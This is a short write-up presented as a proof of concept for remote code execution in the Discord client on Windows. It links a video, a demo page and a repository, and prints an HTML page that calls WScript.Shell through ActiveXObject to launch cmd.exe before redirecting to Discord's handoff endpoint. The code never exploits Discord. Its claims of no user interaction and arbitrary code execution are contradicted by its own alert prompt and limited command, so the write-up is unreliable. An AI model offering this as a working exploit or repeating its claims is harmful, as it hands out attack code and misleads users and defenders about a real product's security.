Discord Remote Code Execution Proof of Concept
Vulnerability Overview
The vulnerability exists in the Discord client; an attacker can achieve remote code execution on Windows systems through a specially crafted web page. Even when the Discord application is not running, the vulnerability can force the application to launch and execute malicious code.
Technical Details
Proof-of-Concept Video
https://www.youtube.com/watch?v=dEGhIpIvBA0
Vulnerability Verification Page
https://SleepTheGod.github.io/discord_rce.html
Source Code Repository
https://github.com/SleepTheGod/Discord-RCE
PoC Code Implementation
```html
<!DOCTYPE html>
<html lang="en">
<head>
  <meta charset="UTF-8">
  <meta name="viewport" content="width=device-width, initial-scale=1.0">
  <title>Redirecting...</title>
  <script>
    onload = function() {
      alert("LOL YOU SURE YOU KNOW WHAT YOU ARE DOING HERE CLICK OK TO POP DISCORD");
    };

    function getQueryParam(param) {
      const urlParams = new URLSearchParams(window.location.search);
      return urlParams.get(param);
    }

    function isValidPayload(payload) {
      // Add payload validation logic, e.g. regex matching
      const regex = /^[a-zA-Z0-9_-]+$/; // Example: alphanumerics, underscore, hyphen
      return regex.test(payload);
    }

    function openCmd() {
      try {
        var shell = new ActiveXObject("WScript.Shell");
        shell.run("cmd.exe");
      } catch (e) {
        alert("This action is not supported in this browser or is blocked for security reasons.");
      }
    }

    // Note: this assignment replaces the onload handler defined above.
    window.onload = function() {
      const payload = getQueryParam('payload');
      let targetUrl = 'https://discord.com/handoff';
      if (payload && isValidPayload(payload)) {
        targetUrl += `?payload=${encodeURIComponent(payload)}`;
        if (payload === 'openCmd' && window.ActiveXObject) {
          openCmd();
        }
      }
      setTimeout(function() {
        window.location.href = targetUrl;
      }, 3000);
    }
  </script>
</head>
<body>
  <p>If you are not redirected automatically, <a id="redirectLink" href="https://discord.com/handoff">click here</a>.</p>
  <script>
    const payload = getQueryParam('payload');
    let targetUrl = 'https://discord.com/handoff';
    if (payload && isValidPayload(payload)) {
      targetUrl += `?payload=${encodeURIComponent(payload)}`;
      if (payload === 'openCmd' && window.ActiveXObject) {
        openCmd();
      }
    }
    document.getElementById('redirectLink').href = targetUrl;
  </script>
</body>
</html>
```
Technical Points
- Attack vector: code execution through Discord's handoff endpoint
- Platform restriction: affects Windows systems only
- Execution conditions: no user interaction required; the Discord application can be force-launched
- Payload validation: input validation using a regular expression
- Command execution: WScript.Shell is invoked via ActiveXObject to run system commands
Impact
The vulnerability allows an attacker to remotely execute arbitrary code on the victim's machine and poses a severe security risk.